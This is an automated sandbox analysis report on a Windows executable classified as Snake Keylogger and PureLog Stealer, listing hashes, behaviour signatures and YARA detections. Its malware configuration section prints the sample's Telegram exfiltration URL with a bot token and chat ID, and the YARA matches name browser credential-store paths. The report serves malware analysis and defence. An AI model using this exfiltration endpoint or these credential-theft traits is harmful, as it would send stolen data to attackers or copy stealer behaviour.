Edit tour

Windows Analysis Report
SOA SEP 2024.exe

Overview

General Information

Sample name:	SOA SEP 2024.exe
Analysis ID:	1560694
MD5:	3463c053c39de2170aa78b8aa253e999
SHA1:	e40e4169c635a3a34acb63928ad2ce89089a52fe
SHA256:	4b53b5e5756b9b3f43e32650b65590d0fe529e653a469b361df4bcf710b4e943
Tags:	exeRedLineStealeruser-lowmal3
Infos:

Detection

PureLog Stealer, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected Snake Keylogger

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Generic Downloader

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

SOA SEP 2024.exe (PID: 6348 cmdline: "C:\Users\user\Desktop\SOA SEP 2024.exe" MD5: 3463C053C39DE2170AA78B8AA253E999)

RegSvcs.exe (PID: 1560 cmdline: "C:\Users\user\Desktop\SOA SEP 2024.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7399492470:AAF1Q52TLq6uEICFiCVrLu9dpROnjh2wukI/sendMessage?chat_id=1443320838", "Token": "7399492470:AAF1Q52TLq6uEICFiCVrLu9dpROnjh2wukI", "Chat_id": "1443320838", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2102007208.00000000006C0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 A9 88 44 24 2B 88 44 24 2F B0 E5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000002.00000002.4553786112.0000000003359000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x250aa:$a1: get_encryptedPassword 0x2507e:$a2: get_encryptedUsername 0x25142:$a3: get_timePasswordChanged 0x2505a:$a4: get_passwordField 0x250c0:$a5: set_encryptedPassword 0x24e8d:$a7: get_logins 0x214f7:$a10: KeyLoggerEventArgs 0x214c6:$a11: KeyLoggerEventArgsEventHandler 0x24f61:$a13: _encryptedPassword
00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2acca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x29efb:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a32e:$a4: \Orbitum\User Data\Default\Login Data 0x2b36f:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2398a:$s1: UnHook 0x23926:$s2: SetHook 0x2395f:$s3: CallNextHook 0x238ee:$s4: _hook
00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x28310:$x1: $%SMTPDV$ 0x26cf4:$x2: $#TheHashHere%& 0x282b8:$x3: %FTPDV$ 0x26c94:$x4: $%TelegramDv$ 0x214c6:$x5: KeyLoggerEventArgs 0x214f7:$x5: KeyLoggerEventArgs 0x282dc:$m2: Clipboard Logs ID 0x2851a:$m2: Screenshot Logs ID 0x2862a:$m2: keystroke Logs ID 0x28904:$m3: SnakePW 0x284f2:$m4: \SnakeKeylogger\
00000002.00000002.4552483120.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 A9 88 44 24 2B 88 44 24 2F B0 E5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2961a:$a1: get_encryptedPassword 0x5c752:$a1: get_encryptedPassword 0x295ee:$a2: get_encryptedUsername 0x5c726:$a2: get_encryptedUsername 0x296b2:$a3: get_timePasswordChanged 0x5c7ea:$a3: get_timePasswordChanged 0x295ca:$a4: get_passwordField 0x5c702:$a4: get_passwordField 0x29630:$a5: set_encryptedPassword 0x5c768:$a5: set_encryptedPassword 0x293fd:$a7: get_logins 0x5c535:$a7: get_logins 0x25a67:$a10: KeyLoggerEventArgs 0x58b9f:$a10: KeyLoggerEventArgs 0x25a36:$a11: KeyLoggerEventArgsEventHandler 0x58b6e:$a11: KeyLoggerEventArgsEventHandler 0x294d1:$a13: _encryptedPassword 0x5c609:$a13: _encryptedPassword
00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2c880:$x1: $%SMTPDV$ 0x5f9b8:$x1: $%SMTPDV$ 0x2b264:$x2: $#TheHashHere%& 0x5e39c:$x2: $#TheHashHere%& 0x2c828:$x3: %FTPDV$ 0x5f960:$x3: %FTPDV$ 0x2b204:$x4: $%TelegramDv$ 0x5e33c:$x4: $%TelegramDv$ 0x25a36:$x5: KeyLoggerEventArgs 0x25a67:$x5: KeyLoggerEventArgs 0x58b6e:$x5: KeyLoggerEventArgs 0x58b9f:$x5: KeyLoggerEventArgs 0x2c84c:$m2: Clipboard Logs ID 0x2ca8a:$m2: Screenshot Logs ID 0x2cb9a:$m2: keystroke Logs ID 0x5f984:$m2: Clipboard Logs ID 0x5fbc2:$m2: Screenshot Logs ID 0x5fcd2:$m2: keystroke Logs ID 0x2ce74:$m3: SnakePW 0x5ffac:$m3: SnakePW 0x2ca62:$m4: \SnakeKeylogger\
00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x241c2:$a1: get_encryptedPassword 0x24196:$a2: get_encryptedUsername 0x2425a:$a3: get_timePasswordChanged 0x24172:$a4: get_passwordField 0x241d8:$a5: set_encryptedPassword 0x23fa5:$a7: get_logins 0x2060f:$a10: KeyLoggerEventArgs 0x205de:$a11: KeyLoggerEventArgsEventHandler 0x24079:$a13: _encryptedPassword
00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x29de2:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x29013:$a3: \Google\Chrome\User Data\Default\Login Data 0x29446:$a4: \Orbitum\User Data\Default\Login Data 0x2a487:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x22aa2:$s1: UnHook 0x22a3e:$s2: SetHook 0x22a77:$s3: CallNextHook 0x22a06:$s4: _hook
00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x27428:$x1: $%SMTPDV$ 0x25e0c:$x2: $#TheHashHere%& 0x273d0:$x3: %FTPDV$ 0x25dac:$x4: $%TelegramDv$ 0x205de:$x5: KeyLoggerEventArgs 0x2060f:$x5: KeyLoggerEventArgs 0x273f4:$m2: Clipboard Logs ID 0x27632:$m2: Screenshot Logs ID 0x27742:$m2: keystroke Logs ID 0x27a1c:$m3: SnakePW 0x2760a:$m4: \SnakeKeylogger\
00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x65f90:$a1: get_encryptedPassword 0x65f64:$a2: get_encryptedUsername 0x66028:$a3: get_timePasswordChanged 0x65f40:$a4: get_passwordField 0x65fa6:$a5: set_encryptedPassword 0x65d73:$a7: get_logins 0x623dd:$a10: KeyLoggerEventArgs 0x623ac:$a11: KeyLoggerEventArgsEventHandler 0x65e47:$a13: _encryptedPassword
00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x691f6:$x1: $%SMTPDV$ 0x67bda:$x2: $#TheHashHere%& 0x6919e:$x3: %FTPDV$ 0x67b7a:$x4: $%TelegramDv$ 0x623ac:$x5: KeyLoggerEventArgs 0x623dd:$x5: KeyLoggerEventArgs 0x691c2:$m2: Clipboard Logs ID 0x69400:$m2: Screenshot Logs ID 0x69510:$m2: keystroke Logs ID 0x697ea:$m3: SnakePW 0x693d8:$m4: \SnakeKeylogger\
00000002.00000002.4553786112.00000000031D9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 1560	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 1560	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 1560	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 1560	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xfc0e:$a1: get_encryptedPassword 0x4f5c5:$a1: get_encryptedPassword 0x86a70:$a1: get_encryptedPassword 0x9b8f6:$a1: get_encryptedPassword 0xfbe2:$a2: get_encryptedUsername 0x4f599:$a2: get_encryptedUsername 0x86a44:$a2: get_encryptedUsername 0x9b8ca:$a2: get_encryptedUsername 0xfca6:$a3: get_timePasswordChanged 0x4f65d:$a3: get_timePasswordChanged 0x86b08:$a3: get_timePasswordChanged 0x9b98e:$a3: get_timePasswordChanged 0xfbbe:$a4: get_passwordField 0x4f575:$a4: get_passwordField 0x86a20:$a4: get_passwordField 0x9b8a6:$a4: get_passwordField 0xfc24:$a5: set_encryptedPassword 0x4f5db:$a5: set_encryptedPassword 0x86a86:$a5: set_encryptedPassword 0x9b90c:$a5: set_encryptedPassword 0xf9fa:$a7: get_logins
Process Memory Space: RegSvcs.exe PID: 1560	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0xbf26:$x5: KeyLoggerEventArgs 0xbf57:$x5: KeyLoggerEventArgs 0xbf97:$x5: KeyLoggerEventArgs 0xbfc6:$x5: KeyLoggerEventArgs 0x4b8dd:$x5: KeyLoggerEventArgs 0x4b90e:$x5: KeyLoggerEventArgs 0x4b94e:$x5: KeyLoggerEventArgs 0x4b97d:$x5: KeyLoggerEventArgs 0x82d88:$x5: KeyLoggerEventArgs 0x82db9:$x5: KeyLoggerEventArgs 0x82df9:$x5: KeyLoggerEventArgs 0x82e28:$x5: KeyLoggerEventArgs 0x97ae9:$x5: KeyLoggerEventArgs 0x97b1a:$x5: KeyLoggerEventArgs 0x97b5a:$x5: KeyLoggerEventArgs 0x97b89:$x5: KeyLoggerEventArgs 0x137df:$m2: Clipboard Logs ID 0x138e4:$m2: Screenshot Logs ID 0x1396c:$m2: keystroke Logs ID 0x53196:$m2: Clipboard Logs ID 0x5329b:$m2: Screenshot Logs ID
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.RegSvcs.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 A9 88 44 24 2B 88 44 24 2F B0 E5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0.2.SOA SEP 2024.exe.6c0000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 A9 88 44 24 2B 88 44 24 2F B0 E5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
2.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 A9 88 44 24 2B 88 44 24 2F B0 E5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
2.2.RegSvcs.exe.5750000.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.5750000.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.5750000.7.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RegSvcs.exe.5750000.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x232aa:$a1: get_encryptedPassword 0x2327e:$a2: get_encryptedUsername 0x23342:$a3: get_timePasswordChanged 0x2325a:$a4: get_passwordField 0x232c0:$a5: set_encryptedPassword 0x2308d:$a7: get_logins 0x1f6f7:$a10: KeyLoggerEventArgs 0x1f6c6:$a11: KeyLoggerEventArgsEventHandler 0x23161:$a13: _encryptedPassword
2.2.RegSvcs.exe.5750000.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x28eca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x280fb:$a3: \Google\Chrome\User Data\Default\Login Data 0x2852e:$a4: \Orbitum\User Data\Default\Login Data 0x2956f:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.5750000.7.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x21b8a:$s1: UnHook 0x21b26:$s2: SetHook 0x21b5f:$s3: CallNextHook 0x21aee:$s4: _hook
2.2.RegSvcs.exe.5750000.7.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x26510:$x1: $%SMTPDV$ 0x24ef4:$x2: $#TheHashHere%& 0x264b8:$x3: %FTPDV$ 0x24e94:$x4: $%TelegramDv$ 0x1f6c6:$x5: KeyLoggerEventArgs 0x1f6f7:$x5: KeyLoggerEventArgs 0x264dc:$m2: Clipboard Logs ID 0x2671a:$m2: Screenshot Logs ID 0x2682a:$m2: keystroke Logs ID 0x26b04:$m3: SnakePW 0x266f2:$m4: \SnakeKeylogger\
2.2.RegSvcs.exe.4175570.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.4175570.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.4175570.5.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RegSvcs.exe.4175570.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x232aa:$a1: get_encryptedPassword 0x2327e:$a2: get_encryptedUsername 0x23342:$a3: get_timePasswordChanged 0x2325a:$a4: get_passwordField 0x232c0:$a5: set_encryptedPassword 0x2308d:$a7: get_logins 0x1f6f7:$a10: KeyLoggerEventArgs 0x1f6c6:$a11: KeyLoggerEventArgsEventHandler 0x23161:$a13: _encryptedPassword
2.2.RegSvcs.exe.4175570.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x28eca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x280fb:$a3: \Google\Chrome\User Data\Default\Login Data 0x2852e:$a4: \Orbitum\User Data\Default\Login Data 0x2956f:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.4175570.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x21b8a:$s1: UnHook 0x21b26:$s2: SetHook 0x21b5f:$s3: CallNextHook 0x21aee:$s4: _hook
2.2.RegSvcs.exe.4175570.5.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x26510:$x1: $%SMTPDV$ 0x24ef4:$x2: $#TheHashHere%& 0x264b8:$x3: %FTPDV$ 0x24e94:$x4: $%TelegramDv$ 0x1f6c6:$x5: KeyLoggerEventArgs 0x1f6f7:$x5: KeyLoggerEventArgs 0x264dc:$m2: Clipboard Logs ID 0x2671a:$m2: Screenshot Logs ID 0x2682a:$m2: keystroke Logs ID 0x26b04:$m3: SnakePW 0x266f2:$m4: \SnakeKeylogger\
2.2.RegSvcs.exe.2ee4ee6.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2ee4ee6.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2ee4ee6.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RegSvcs.exe.2ee4ee6.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x232aa:$a1: get_encryptedPassword 0x2327e:$a2: get_encryptedUsername 0x23342:$a3: get_timePasswordChanged 0x2325a:$a4: get_passwordField 0x232c0:$a5: set_encryptedPassword 0x2308d:$a7: get_logins 0x1f6f7:$a10: KeyLoggerEventArgs 0x1f6c6:$a11: KeyLoggerEventArgsEventHandler 0x23161:$a13: _encryptedPassword
2.2.RegSvcs.exe.2ee4ee6.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x28eca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x280fb:$a3: \Google\Chrome\User Data\Default\Login Data 0x2852e:$a4: \Orbitum\User Data\Default\Login Data 0x2956f:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2ee4ee6.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x21b8a:$s1: UnHook 0x21b26:$s2: SetHook 0x21b5f:$s3: CallNextHook 0x21aee:$s4: _hook
2.2.RegSvcs.exe.2ee4ee6.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x26510:$x1: $%SMTPDV$ 0x24ef4:$x2: $#TheHashHere%& 0x264b8:$x3: %FTPDV$ 0x24e94:$x4: $%TelegramDv$ 0x1f6c6:$x5: KeyLoggerEventArgs 0x1f6f7:$x5: KeyLoggerEventArgs 0x264dc:$m2: Clipboard Logs ID 0x2671a:$m2: Screenshot Logs ID 0x2682a:$m2: keystroke Logs ID 0x26b04:$m3: SnakePW 0x266f2:$m4: \SnakeKeylogger\
2.2.RegSvcs.exe.4176458.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.4176458.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.4176458.4.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RegSvcs.exe.4176458.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x223c2:$a1: get_encryptedPassword 0x22396:$a2: get_encryptedUsername 0x2245a:$a3: get_timePasswordChanged 0x22372:$a4: get_passwordField 0x223d8:$a5: set_encryptedPassword 0x221a5:$a7: get_logins 0x1e80f:$a10: KeyLoggerEventArgs 0x1e7de:$a11: KeyLoggerEventArgsEventHandler 0x22279:$a13: _encryptedPassword
2.2.RegSvcs.exe.4176458.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x27fe2:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x27213:$a3: \Google\Chrome\User Data\Default\Login Data 0x27646:$a4: \Orbitum\User Data\Default\Login Data 0x28687:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.4176458.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x20ca2:$s1: UnHook 0x20c3e:$s2: SetHook 0x20c77:$s3: CallNextHook 0x20c06:$s4: _hook
2.2.RegSvcs.exe.4176458.4.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x25628:$x1: $%SMTPDV$ 0x2400c:$x2: $#TheHashHere%& 0x255d0:$x3: %FTPDV$ 0x23fac:$x4: $%TelegramDv$ 0x1e7de:$x5: KeyLoggerEventArgs 0x1e80f:$x5: KeyLoggerEventArgs 0x255f4:$m2: Clipboard Logs ID 0x25832:$m2: Screenshot Logs ID 0x25942:$m2: keystroke Logs ID 0x25c1c:$m3: SnakePW 0x2580a:$m4: \SnakeKeylogger\
